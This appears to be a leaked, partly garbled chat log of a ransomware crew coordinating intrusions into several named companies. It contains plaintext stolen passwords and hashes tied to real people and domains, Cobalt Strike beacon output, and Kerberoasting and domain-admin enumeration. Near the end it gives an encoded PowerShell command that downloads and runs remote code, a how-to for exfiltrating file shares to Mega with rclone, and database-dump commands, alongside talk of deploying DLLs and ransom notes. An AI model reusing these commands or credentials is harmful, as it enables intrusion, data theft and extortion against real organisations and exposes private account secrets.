WATERWAY\U05 05Blues `` where did you get this? ``05Blues``031bac9c9ef2cfcc9b630ab7fae8c0ed as well as on rootlintam still has an alert for temperature`` Message: Temperature sensor bp-temp1 on shelf AF-180176 at left-side backplane is 33 Celsius. Check air temperature and air flow around the array. ````https://wwhq62nas.us2.quickconnect.to/ ``the rdp port is open the rest is nottpio writes login was from this ipai ask what the rdp know) ``ww-nimble-01 `` is the nibble which is 192.168.0.75 what do we have here? 127.0.1.2:3389 `````` Time: Wed Oct 7 10:58:43 2020 Type: 14806 ID: 13472 Message: Root login to controller A from 127.0.1.2 succeeded. Group Name: Group1 Array name: ww-nimble-01 Serial: AF-180176 Version: 4.5.2.0-553085-opt Arrays in the group: ---------------------+-----------------+-----------+---------------- Name Serial Model Version ---------------------+-----------------+-----------+---------------- ww-nimble-01 AF-180176 CS1000 4.5.2.0-553085-opt ``cloudy?``https://192.168.63.30:5001/`` - same us` ``https://waterway63.us2.quickconnect.to/` - 1 more us``1Vanilla2` give password 096d6208ddf94d8e3fcf87e3e1aa1ebf`` 192.168.0.3 Waterway 11915Wnas2179!
`````` --- Chromium Credential (User: blauer) --- URL : Username : waterwayapps@gmail.com Password : 2Vanilla1 --- Chromium Credential (User: blauer) --- URL : https://auth.vantiv.com/openam/UI/Login Username : blauer@waterway.com Password : 11915Iq2179! --- Chromium Credential (User: blauer) --- URL : Username : blauer@waterway.com Password : 11915Gi2179! --- Chromium Credential (User: blauer) --- URL : https://www.serversupply.com/process_order4.asp Username : blauer@waterway.com Password : 11915Ss2179 `````` LEVASHENKO-PC: 192.168.0.22 mharper WWSQL: 192.168.0.188 blauer LAB-OFFICE: 192.168.0.161 administrator ``No luck? and mail the hostname ``ww-nimble-01``1Vanilla2 ``but there is a client installed check the installed software else`` WATERWAY\gkeller Waterway76 `````` 192.168.0.162:3389 if the service is off do you turn it on? if the service is on do you turn it off do you turn it on why do you say the rdp does not let techies in? 21 ftp 22,23 ssh, telnet 80,443 http, https 5900 VNC 3389 Microsoft Terminal Server (rdp) 5631,5632 pcAnywhere 445,1433 MS-SQL Server 3306 MySQL 1521,2483 Oracle 5432 PostgreSQL 5938 nbvdm.th 7199 JMX monitoring port 7000 inter-node cluster 7001 SSL inter-node cluster 9042 CQL Native Transport Port 9160 Thrift DataStax OpsCenter 61620 opscenterd daemon 61621 Agent 8888 Website 1-30,80,443,5900,3389,5631,5632,445,1433,3306,1521,2483,5432,5938,7199,7000,7001,9042,9160,61620,8888,61621 ``By the way, here's an addition to the port 0.1:5432") shows that PostgreSQL is listening only for connections originating from the local computer, so we will have to edit the My mistake. 
pcAnywhere was a suite of computer programs by Symantec which allows a user of the pcAnywhere remote program on a computer to connect to a personal computer running the pcAnywhere host if both are connected to interconnected networks and the password is known `````` PCAnywhere uses ports 5631 (Data port or Transmission Control Protocol [TCP]) and 5632 (Status port or User Datagram Protocol [UDP]) to communicate ``you know what this is?)``192.168.0.75:5432```` 192.168.0.75:5432 192.168.0.75:443 192.168.0.75:80 [+] received output: 192.168.0.75:22 (SSH-2.0-OpenSSH_7.4) Scanner module is complete ``Please pay attention to 2http/chttp what scheme are you connecting to? https://192.168.0.42 https://192.168.0.43 https://192.168.0.75 https://192.168.0.77 ``what ip?'' No rdp on nimblenet too User: gkeller - IP Address: 192.168.0.162 ``No rdp here, what's the IP? WATERWAY\mapusatera Gators1853 `````` CurrentUser : WATERWAY\mapusatera Idletime : 01h:54m:23s:531ms (352463531 milliseconds) ``172.17.112.1 as I understand the pdf says that they are from the AD check only idletimevariant good and from there to chekatmb to them on RDP go to the thing about the Guy nimbala I have on all tacts several IP inputs as I understand + you on the same ip go?[I have a few different ways to get to him, but I don't know how to get to him. gkeller 134cee9671bb94bffdaefb6f84f5989d Now that's interesting.
dn:CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >objectClass: top >objectClass: group >cn: Nimble Admins >member: CN=Brandon Lauer,CN=Users,DC=waterway,DC=com >member: CN=Dianne Jarden,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com >member: CN=appliedgroup,OU=Special Users,OU=Corporate,DC=waterway,DC=com >member: CN=Greg Keller,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com >member: CN=Mark Harper,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com >member: CN=Mike Pusatera,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com >member: CN=Administrator,OU=Special Users,OU=Corporate,DC=waterway,DC=com ``` ``` blauer djarden gkeller waterway76 mharper mapusatera Gators1853 Administrator 1853Gators the same with ssx similarly doyten you do not go through rdp via proxy any manipulations with the network are done through a dedik as rdp ssx skl web and so on you still dedik for that, do you connect to the network through ssx proxy?) to summarize: use vince to test ssx accesses with vince also happens, but rarely. in more serious systems on the same level as the current date of connection will hang an error that there was a failed attempt to enter on such and such a day from such and such a path during authorization successful afterwards just if through ssh directly fixed message in the log getsthere is already experience)do not knowhough here, about whether a failed password gets into the log during copying via sabinet - here I will not argue))) I know, constantly use. Not winSCP though, but the usual linux one. but underneath both Ibsch is not pure ssh WinSCP supports five transfer protocols: SFTP (SSH File Transfer Protocol); FTP (File Transfer Protocol); SCP (Secure Copy Protocol); Can sshp help? It's the same ssh under the hood, but proxies don't help. a) you can fuck up your password at least, and this message about failed logon the next time you log on to SCP b) the alerts to your email c) Login by proxy proxy proxy so we are through proxy. 
and I have not heard about vincezp...for the simple reason that if you catch a wrong password you will not leave a passchalk in the form of logs at the login accesses are tested ONLY WITHIN vincezp do not forget``` WATERWAY\Applied Waterway99 `````` local-user admin class manage password hash $h$6$yUYGy+aaZlXJHmJn$E6qtQR7QVSx4y2M5eR2N3o6luDGdCZ5iXdLn1a5qGEO/pXQo7Qo2tynxcjVzbNiH2IsvDgEKeye H2W6DyHkJDA== service-type telnet http https terminal authorization-attribute user-role network-admin authorization-attribute user-role network-operator # local-user applied class manage password hash $h$6$hKewp2sE1Ks4S7TF$/ymqDpm46U4XCP9njU4FMbDOxm9Gwnk0oC7ScVyhFSwKIn7M42+gfjHGOBIVAtfM1J5tvL3U xKW4isDfXhCjpw== ``What do you know now about the usefulness of the mail) at the post office admins - where? there is a doc with the settings on the mail screenshot? 22roottakoy and only such and only such ashhostnamevbibee ip on the request backup issued takoene then read))) and procheck passwords through mail can pass keys if we nimbles, what's the point of mail?why should mail have priority or look for a separate tool on git[ ](https://mediaeveryone.com/group/waterway-com?msg=FqeuTwcmZRLrWvD5L) why should mail have priority? URL : https://mail.datotel.com/ Username : jboden@waterway.com Password : Moose1234! ``nimbles has ssh, but it's keyed. what can i do to get the creds off putty? user9https://www.stellarinfo.com/article/export-exchange-2010-mailbox-to-pst.php`` Username : Administrator Domain : ALLOY Password : j@mez9olk ``Trying to log in to the ehas under dudes that have ``ou=Exchange Administrative Group`` with mailsniper, rumor has it that it doesn`t work[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=aw69Bm6w9zALkpsCB) went to the exh server, opened the exh shell, it fell out with this oneilsniper? WARNING: No Exchange servers are available in the Active Directory site Suzhou. Connecting to an Exchange server in another Active Directory site. 
VERBOSE: Connecting to Exchange.rtpco.local. `````` Username : arobinsona Domain : RTPCO Password : Passw0rd! Username : O365Service Domain : RTPCO Password : Password1! ``If we've done our best, why wait for him to write ``. Trend breaks the locker, not the note, but now it also breaks the tht, that's why it doesn't leave a note it's better to wait for mana ``I'm not sure if it's all encrypted there, so unscramble it and fuck with their heads.) Or make a file with a different name and content slightly tampered with.What about the note if the locker worked ok? mostly kerbs no attention or 1-2 networks maxrode nigdea tell me where the NTDS dumped there `` I can't find my build on my hardcodile triad just psh doesn't work) there's a guy who "rules" it out there and please give me a .net shairfinder will you take it? i'll brougt the vpnotscan sabiki find adr? ok i'll give all vpnos to work for it already there's one on backdoor triadmetals alloypolimers ballymoregroup how much? they said you have the grids? tomorrow's boot? yes please clean out the dead sessions there yes? no need, i already ordered it, i just want to test it today on some and this one will do fine1 i can give you a fresh one i ordered 3 for the boot i can give you the old one, it's the one wilson lochy you ordered a new one for you already the old one? cause the old one) i thought you flooded it aaa ok give it to @user4 i can work on it? you do not use this server?
104.194.10.161ARCHIVE.loomisco.com yes, extended, please``` loomisco.com\EDIADMIN:APPSYS loomisco.comShutdown:p3bk@c1 loomisco.com/Omiller:Angela327! ``I'll write a full report with commands or only the steps? Immediately report as found@tl1 @tl2Keach such error reduces the number of remaining authorization attempts before the account is blocked. ERROR: Logon failure: unknown user name or bad password. `````` beacon> net share [*] Tasked beacon to run net share on localhost [+] host called home, sent: 104505 bytes [+] received output: Shares at \localhost: Share name Comment ---------- ------- ADMIN$ Remote Admin C$ Default share F$ Default share IPC$ Remote IPC Scan_Data `````` beacon> net logons [*] Tasked beacon to run net logons on localhost [+] host called home, sent: 104506 bytes [+] received output: Logged on users at \localhost: [+] received output: Loomisco\Backupuser SCANSTORAGE\Backupuser Loomisco\Backupuser LOOMIS\SCANSTORAGE$ ``loomisco.com beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: loomisco.com ````Loomisco\Backupuser ASdnmxcsdf@#d```` beacon> net domain_controllers [*] Tasked beacon to run net domain_controllers [+] host called home, sent: 104518 bytes [+] received output: Domain Controllers: Server Name IP Address ----------- ---------- TLCDC1 192.168.0.192 TLCDC2 192.168.0.222 ``user9files won't fly (sextg@tl1``)
``` I managed to get the hashes down. Teemo[SFE18491]Hgutierreze/792560|2021Jan28 20:51:16> shell tasklist /v /s CORPKIOVDAPGM01.corp.televisa.com.mx [*] tasked beacon to run: tasklist /v /s CORPKIOVDAPGM01.corp.televisa.com.mx [+] host called home, sent: 82 bytes ``` something does not draw the car@user7 then work here `` User : NT AUTHORITY\SYSTEM Window : Conexión - Internet Explorer Time : 2021-01-28 09:36:38 a. m. LogFile : WireTap.log ---------------------------------------------- hgutie [+] received output: 73HILArioge= Just like a peep in the eye. TrGUI ======= R8WTksIOle1rP8)P 253758 ``` vpn``.
```
202B    fil 09/23/2020 16:25:07 pas.txt
903.2KB fil 09/21/2020 14:59:51 seatinfo.txt
```
and files left)
I won't repeat any more where the hash format
```
[*] Tasked beacon to psinject: invoke-kerberoast | fl into 508 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
TicketByteHexStream :
Hash : $krb5tgs$host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amAccountName : Pwwadfssvc
DistinguishedName : CN=PwwAdfs Svc,OU=Users,OU=AuthManagement,DC=gpj,DC=loc
ServicePrincipalName : host/STS.GPJ.COM
```
```
[RESULT] Username: Administrator (built-in)
[RESULT] Changed: 2015-06-29 09:18:32
[RESULT] Password: DdhGmek/pc
[RESULT] Username: install
[RESULT] Changed: 2015-06-29 09:46:46
[RESULT] Password: rt/98740/pc
[RESULT] Username: Lack
[RESULT] Changed: 2014-10-06 09:45:54
[RESULT] Password: RT+farbe
```
if there is time to work with the NAS
session arrived) ah, then delete all but one dead one, with a ping in a few hours
did you have dead ones? if there are ? with you, what happens to mine?
ok, go back to the other 14 tasks
closed without a note? great) in the root the readme appeared) ok
if there will be a readme then ok
try to run the dll
17 will not work? ok, take a secondary server with a session
up to 15 max there? so much? if more than 10 is it ok?
all mapping or whatever? no, I just picked up the disks ts.
I'll check if the shares are done? + in short, I'll work in a shared cob, maybe delete 50 units?
it seems that I have a problem with the cob. ran the dll from user7, the session flew to him. he tried to throw it to me - no luck. then he threw it into the cob where we are now taking the session. I tried to dump it on myself - again no luck. I restarted cobalt at 7 o'clock. I'll try the others.
I went in order and stopped at the first one and masked the rest.
no use, llvm and both checkboxes checked - no session anyway. I made a dll in the builder, it copied, I ran it, it disappeared, but no session... I'll give you access to the builder.
a dll may be better, mine will not raise a session
ok, is the build left? ok, let's do
maybe it is. stalin says "dunno"
```
 Volume in drive \\10.0.61.17\c$ has no label.
 Volume Serial Number is F476-EA6A

 Directory of \\10.0.61.17\c$

08/22/2013  08:52 AM              PerfLogs
12/08/2020  05:22 PM       204,192 pl64.dll
03/29/2019  01:30 PM              Program Files
12/09/2020  07:42 AM              Program Files (x86)
12/09/2020  08:06 AM    42,606,592 redcloak.msi
03/06/2015  10:26 AM              sysprep
06/13/2019  02:08 PM              Users
07/25/2020  07:12 PM              Windows
10/26/2018  12:36 PM              Zabbix_Agent
```
but I don't see a note in these, ok. the dll could have stayed since the sessions were from a process and the dll can't be killed
```
 Volume in drive \\10.0.61.87\c$ has no label.
 Volume Serial Number is 6847-A1AE

 Directory of \\10.0.61.87\c$

09/14/2012  12:22 PM     5,210,976 445622_intl_x64_zip.exe
03/23/2016  01:35 PM     1,435,680 adksetup(1).exe
06/03/2011  12:54 PM           119 FIREWALL
12/10/2020  07:07 AM             0 KBSERVICE.SHUTDOWN
06/03/2011  01:10 PM       924,544 keyManagementServiceHost.exe
11/19/2014  04:57 PM       434,152 office2013volumelicensepack_x86_en-us.exe
07/13/2009  07:34 PM              PerfLogs
12/08/2020  05:37 PM             0 pl64.dll
03/29/2019  01:30 PM              Program Files
01/16/2018  04:10 PM              Program Files (x86)
05/21/2020  09:53 AM              Users
01/14/2019  11:33 AM              Win7AndW2K8R2-KB3191566-x64
12/08/2020  06:34 PM              Windows
07/02/2012  02:32 AM     5,084,750 Windows6.1-KB2691586-v9-x64.msu
10/21/2013  12:45 PM     7,769,979 Windows6.1-KB2885698-x64.msu
10/29/2018  02:49 PM              Zabbix_Agent
```
```
 Directory of \\10.0.50.71\c$

08/03/2017  01:19 PM              B5465 P639 Firmware
08/03/2017  01:18 PM   223,498,304 B5465 P639 Firmware.zip
11/03/2017  09:55 AM              batch
08/17/2017  01:43 PM              Canon_backups
09/12/2016  04:34 AM              logs
02/24/2018  06:04 AM              PerfLogs
12/08/2020  05:19 PM       204,192 pl64.dll
11/03/2017  09:58 AM              Printer_Exports
03/29/2019  01:29 PM              Program Files
12/09/2020  02:51 PM              Program Files (x86)
10/24/2016  07:12 AM              sysprep
10/05/2020  02:13 PM              Users
11/21/2020  08:29 PM              Windows
10/26/2018  08:11 AM              Zabbix_Agent
07/16/2018  01:39 AM         2,423 __PatchLink0026.cab
```
```
 Volume in drive \\10.0.61.117\c$ has no label.
 Volume Serial Number is D242-6D7F

 Directory of \\10.0.61.117\c$

11/01/2016  10:32 AM     7,789,336 ControlNowAgentSetup.exe
09/12/2016  04:34 AM              Logs
05/28/2018  02:16 AM              PerfLogs
12/08/2020  05:18 PM       204,192 pl64.dll
03/29/2019  05:54 PM              Program Files
12/09/2020  10:18 AM              Program Files (x86)
12/09/2020  08:06 AM    42,606,592 redcloak.msi
10/26/2017  01:43 PM              sysprep
01/29/2019  04:13 PM              Users
11/22/2020  08:30 PM              Windows
10/26/2018  09:41 AM              Zabbix_Agent
               3 File(s)     50,600,120 bytes
               8 Dir(s)  82,381,557,760 bytes free
```
at the root of....
```
12/08/2020  05:01 PM       204,192 pl64.dll
```
the dll remained; either it raised or it did not attract.
let me ask stalin - his server was
```
SHAREP-WEB1: 10.0.61.53
 Volume in drive \\10.0.61.53\c$ has no label.
 Volume Serial Number is F476-EA6A

 Directory of \\10.0.61.53\c$

02/09/2015  11:34 AM              inetpub
08/22/2013  08:52 AM              PerfLogs
12/08/2020  05:01 PM       204,192 pl64.dll
03/29/2019  05:54 PM              Program Files
10/08/2019  10:19 AM              Program Files (x86)
02/11/2015  09:59 AM              root
02/05/2015  09:42 AM              sysprep
05/24/2017  01:29 PM              Users
07/26/2020  07:12 PM              Windows
               1 File(s)        204,192 bytes
               8 Dir(s)  68,786,823,168 bytes free
```
ok
there's nothing on these servers at all, no share or disk, from all the servers
did you get them all? and take them off in general \\host\c$
I'll check this
dir \\host\c$\readme.txt >> report.txt
returned files
```
10.0.53.58 ""
10.0.51.45 ""
10.0.254.22 ""
10.0.53.57 ""
10.0.53.54 ""
10.0.61.54 ""
10.0.53.53 ""
10.0.53.56 ""
10.0.61.86
```
there's no share here?
and it's being reported on the 174 servers now
hm, right now) run it under the admin and change the host in a loop or something like that
make a batch file with a loop in it
dir \\host\c$\readme.txt >> report.txt
If you manually go through 200 servers you'll get bored
FINIIS1 - pings, nothing opens
MANITOU - note there
ADMINDC5 - note there
ADM-RADIUS1 - note there
ESPAPP3 - does not respond
```
The request will be processed at a domain controller for domain main.crispregional.org.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            Allscripts_Admin         allscripts_services
AllscriptsSQL            amhs-admin               ashleys
blove                    dragon                   helpdesk
htservice                jwashburn1               MBAM-RW-SVC
meditech                 meditech-admin           mhiers
nodom                    pbodrey                  rlagrone
rthomas                  smaxwell                 spf_svcs
tcoppedge
The command completed successfully.
```
```
[+] received output:
The request will be processed at a domain controller for domain main.crispregional.org.

Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator            rthomas
The command completed successfully.

[+] received output:
The request will be processed at a domain controller for domain main.crispregional.org.

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator            braccosupport            Domain Admins
meditech                 meditech-admin
The command completed successfully.

beacon> shell net localgroup "administrators"
[*] Tasked beacon to run: net localgroup "administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
admin                    Administrator            MAIN\Domain Admins
The command completed successfully.
```
Then throw the actual information into the conf, so that everything is in front of my eyes.
no, not yet? Yes, I'm still finishing up the workstations. So we'll start soon.
So what. octamovemovement went
prinjoin @user8 still, still quietly put
```
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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
```
full
```
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ANgAwADgAaQBzADEAVABLAEUANgA5AHIAegBDAEgAdQB4AEQAOABBAFAAbABXAEUAUQBWAG0ATABJAHEAbwBmAFYASwBkAG8AMQBhADcAawAnACkAKQA7AA==
```
Give me a load of the stuff you don't have... put the dll, it was supposed to be there already. did it come?
ok, if it doesn't come in 30 min, you'll write. 30 min.
put @user4 give me more shellcode
add me to the conf
still 1 help @user8, he has a fat network there, would not want to lose it, build a dll from the live cob there)
is it mine? TomHolzerFord what's his? ask my guys if it's theirs. I'll tell you what's mine... I'm confused, yours is not) ((I mean @user4)
urlbig.com:443 true, found yours now. give others, they do not exist
think about how you'll act, just run your eyes over the map at least
not worthwhile
@user9 write out a plan to close by roadmap 7
under whom? which did not have time? if so, then the conf is not me
yesterday there was another - ballymoregroup.com. if you can get it back, I can continue with it, or user8 help with 26 trusts
conf under it there was another one, but it almost immediately offsolved - did not have time
here mb I will now launch you there, in general those with whom I worked
will see what to give me) no. but for today, yes) are you done with him? no.
we were here with the router again poking around, and you started at 6?
writing, yesterday the last one at the end of the day went to the off
these means to sit and do nothing?
there are no active guys, I'm not a telepath, if you sit without work, write. write that people are working in the input sessions, which like yesterday are still dead. why sit silently. I also do not have a live one in the input cob. is there a new one? or after 3 am or until 6 pm. you know the timing in my grid, kst only 8 am
@user9 if finished, take another network to work) ah) I have it and build skidtak before closing) so ah, close.
we are not closing now. why?
@tl1 add us to @user9 in the conf, if it's not difficult
selfspin.com sorting of servers and other information in the conf.
hi
B corbel.com all ready for closure
then the plan for today is: 2 people who have already taken DA work in the same networks and prepare to close, the rest are lifting the rights meanwhile
Yes, but not all came up
All alive, in sound mind and health?
Hi
To all hello
Yes)
morning) to all
goodnight
To all without misunderstanding
Tomorrow i.e. today
Happy
To all until tomorrow)
hopefully in the evening
By 6
good, yes, two?
without "probably a normal grid" right?
total 2 networks with DA, also DA and dll running `MM-LIB` host where the dll stuck, rolling check and then staskun
at the stage of work with the vpn it was in lrh stuck and did not solve
how did you solve? give the hostname also, yes, and is the dll running?
well I had at least so it was somysmys... was there, yes, looking for edtam xp) ohoho, it winds you ten. tomorrow will solve these cases. get such
```
beacon> shell net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER
[*] Tasked beacon to run: net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER
[+] host called home, sent: 95 bytes
[+] received output:
System error 384 has occurred.

You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
```
boys are part of a group of hp admins
trusts will scour tomorrow in the current one or trasta
herstech.com, fishusa.com, holzerford.com - removed adinfo, kerbs, EA DA. all sessions off.
this is where alloypolymers.com
```
>description: password rbuilder
>description: Generic GroupWise account for Adhesives. Password - pword
>description: Password is pword.
>description: Pword-flas21a. Deco 1
>description: The password is waglobal2014 Password does not expire
>description: For Trackit SQL passqord is trackit114
>description: The service account for DCWAS08 Execel Password is VantgagePoint
```
@user8 here's some food for thought for tomorrow if the session doesn't die
COGNOSPD.korbel.com dcsync was taken off, maybe the lab, now in sleep, waiting for commands `wilsonart.com'.
28 trusts, minus duplicates and quarantines - 7
7 trusts removed from hell, two trusts and the current domain removed from the kerbs
@user9 say his hostname
corbel.com There is DA. ran the dll on the far server, found sphere and creds, found edr and creds. Snatched the AD, lifted the system, no creds to move on, with nyah kerb creds given for decryption.
are there dlls running on the servers? and so yes
to me exactly the networks of interest with DA, which we will close tomorrow
write reports on work
Many of 2826 trusts) are you many left? +++ alive? you about the zealot do not forget?
my keyloggers are empty (there is nothing empty) they just work with shul and sometimes write to each other
keyloggers have not been checked? yes shul there, all in #waterway-com uploading backups, mail, finance, admins + deal with shul
so what do you have? so the sooner we check everything for tomorrow, the sooner we go to bed. today we're closing 2 grids, so the sooner we work, the sooner you go home. today, today, today, by 6, and today we need to prepare everything for tomorrow. I understand you're tired. today we're closing the rt or till 00 work
@tl2 @tl1 same, backups in water. what are you busy doing?
I did not try it, that's why I wrote it like with rdp)) try it without rdp?
it pours very fast because of the high compression. now there is no need for any 7za and unzipping to the mega! everything is very quiet and unnoticeable! download rclone from the official site. put rclone.exe in the right directory, then everything according to the manual. I did everything through rdp. You register a mega, choose it from the huge list which rclone provides us. rclone quietly connects to the mega and makes a clone of what you need. you can even do the whole fs. it downloads everything through rclone, so the download speed is high. Here's the guide.
It's simple https://rclone.org/mega/ next command to download
```
rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
```
remote:NT - change only this. "remote" is the name of your mega. "NT" is your directory in the mega where it will be downloaded to; if it doesn't exist, it will create it itself.
example
```
rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
```
https://rclone.org/ if it requires some amount of data to be uploaded.
8. Backup database
```
sqlcmd -S localhost -E -Q "BACKUP DATABASE name TO DISK='C:\PerfLogs\name.bak'"
```
for a remote/other local server change localhost to ip,port; alternatively localhost,%port% (see netstat)
7. Output all tables of a specific database
```
sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W
```
with size in megabytes
```
sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"
```
1. Display all databases on the server in cmd
```
sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
```
As soon as you jump into the process you look at the database list; by default there is the sqlcmd tool installed on the server, it has direct access to the data (to backup the sqlwriter, sqlsrv processes on the sql server)
worked
I press the bind, nothing happens. what? @tl1
Doesn't work & https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/tools/1vpn check there, upon which there is access to the domain, no load for it
hi
Hi, our evo vpn has fallen away
Hi
Hi
Hi
Well, now checking. did you check wilson? did the file appear on the unshared workstations? flew home. where do we have @user9?
how unexpected and nice
aaa, we miss your family as much as you) missed you?)
hello
To all hello
Do you want me to ask everyone in the conf? I'll throw it into the appropriate conf. aha, I'll dig in the records of strangers to see what there may be of interest. their difficulty, as I understand from @user7, is to find a sphere / backups?
well, let's finish today probably? there he is small, aha) as you see - normal
good evening! @tl1 not yet?
```
BACKUP$
BACKUPDVR$
CHIBACKUP2020$
CLEBACKUP$
CLEBACKUP2020$
DVRBACKUP2020$
DVRNEWBACKUP20$
KCBACKUP2020$
KCNEWBACKUP2020$
NEWBACKUPCHI$
NEWBACKUPCLE$
```
```
\\BLAUERPC\D$
\\DRB2\Archive
\\DRB2\Backup
\\Replication
\\GKELLER\G$\Backup
\\GKELLER\G$\WW2k1\IT\SolarwindsBackups
\\REPORTING\D$\SQLBackup
\\Data\AKPRO_Data\BACKUPS
\\WW2K1\F$\Backup
\\WW2K1\F$Data\AKPRO_Data\BACKUPS
\\WWSQL\S$\SQLBackup
```
```
WATERWAY\blauer 11915Admin2179!
```
```
http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99!
WATERWAY\mharper LoveUnit14
```
Good evening. we're here)))))
Thank you for such flattering words, and @tl1 is also a pleasure to work with. I wish I could find some fine words, but I'll just respond with... an anecdote! A pentester is walking through the desert, he wants sex, he meets a genie, and the genie asks him "What do you want, traveler?" - Fucking, says the pentester. And then out of nowhere appears a bunch of all sorts of spheres without creds, undecrypted md5 hashes, nets in which the domain is not visible and a billion all kinds of AVs. - Get the fuck out of here, the genie answers. - Yes, the last thing I wanted to say, while you're resting, think about whether any of you want to take additional offline courses through the official pentester refresher course. CEH, OSCP and the like. So have nice holidays) see you next year)
Likewise) We are also happy to work with you)
From us too we want to say thank you, it is a very useful experience, especially in such a short period of time.
My head is boiling, but it is interesting) Happy New Year to you =))
In short - all are good) the most difficult part has passed) further it will only be more interesting) from my experience, I say that in comparison you are growing very quickly on the technical part, small slip-ups happen to everyone, and this is normal. But next year we'll get to a completely different speed, start parallel technologies, dig into nixes. I for my part, and @tl1 and the development team, will also be preparing some cool stuff for you, hope I am not mistaken) and for a very short time by the standards of junior pentesters we have come a long way from 0 to the current cases with the -nomutex flag, so I want to share my impressions. then see you soon)
backups in work, the backups are working and I'll be back up by 21 till next tuesday. I will probably be gone by tuesday, but report back here now please =) so @tl1 knows what the plan is)
who can today - pull up to 21; if no one can, go on vacation
I don't know anything.) Let's ask @tl1)
last day also in case of success?
>last case on the last day
of course, no problem, if anyone else can not - say. today "at will", with bonuses in case of success of the work itself
@tl1 we'll have a groundhog day at mine. I just looked at the calendar for the first time in a week and a half or two. I will be able to communicate, but not in the office, in the evening I fly away. I was planning to go on holiday today, so the tickets are bought( I think the guys will cope with a small network without me
a good question, I think to finish some last case on the last day =) and for what, like we said, on holidays go away ...
friends, today's case comes to an end, as the final touches to backup will be solved, the server and workstation checked - all go to rest
@tl1 said before leaving that we're going to 21, have time to rest?
Well, another plus of the exe is a lot of threads.
icacls is a long command, adding /grant full to it, so the exe seemed easier)
there the batch file also swore - and Teamlead2 said, I threw it to you in private, something about regulars, etc.
so policies swear more
eh, on exe and scatter
a batch file is easier than an exe
the same, in order to scatter on the workstations
why not a batch file?
and build me, in the lab running
ok, come on, if /grant full works fine then add it to the exe - a minute
and so and so, ran from the admin?
I checked the batch file in the lab - no problem with this
no - workgroup machine outside the domain?
```
Node Name:                 DESKTOP-5SMSDNR
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18363 N/A
OS Manufacturer:           Microsoft Corporation
OS Settings:               Isolated Workstation
OS Build:                  Multiprocessor Free
Registered Owner:          User
Registered Organization:
Product Code:              00330-80000-00000-AA618
Installation Date:         09/16/2020, 13:38:44
System Boot Time:          12/22/2020, 1:54:35
System Manufacturer:       Gigabyte Technology Co.
System model:              G31M-ES2L
System type:               x64-based PC
Processor(s):              Number of processors - 1.
                           [01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2834 MHz
BIOS version:              Award Software International, Inc. FF, 10/13/2009
Windows folder:            C:\Windows
System folder:             C:\Windows\system32
Boot device:               \Device\HarddiskVolume1
System language:           ru;Russian
Input language:            ru;Russian
Time zone:                 (UTC+03:00) Moscow, St. Petersburg
Full physical memory:      4,085 MB
Available physical memory: 715 MB
Virtual memory: Max size:  5,621 MB
Virtual memory: Available: 828 MB
Virtual memory: Used:      4,793 MB
Swap file location:        C:\pagefile.sys
Domain:                    WORKGROUP
Network login server:      \\DESKTOP-5SMSDNR
Patch(s):                  Number of installed patches - 12.
                           [01]: KB4586878
                           [02]: KB4513661
                           [03]: KB4516115
                           [04]: KB4517245
                           [05]: KB4521863
                           [06]: KB4561600
                           [07]: KB4576751
                           [08]: KB4576754
                           [09]: KB4577670
                           [10]: KB4580325
                           [11]: KB4586863
                           [12]: KB4592449
Network adapters:          Number of network adapters - 2.
                           [01]: Qualcomm Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.30)
                                 Connection Name: Ethernet
                                 DHCP enabled:    Yes
                                 DHCP server:     192.168.88.1
                                 IP address
                                 [01]: 192.168.88.248
                                 [02]: fe80::d935:55:e14f:fe49
                           [02]: VirtualBox Host-Only Ethernet Adapter
                                 Connection Name: VirtualBox Host-Only Network
                                 DHCP enabled:    None
                                 IP address
                                 [01]: 192.168.56.1
                                 [02]: fe80::f4c1:748b:225c:98a0
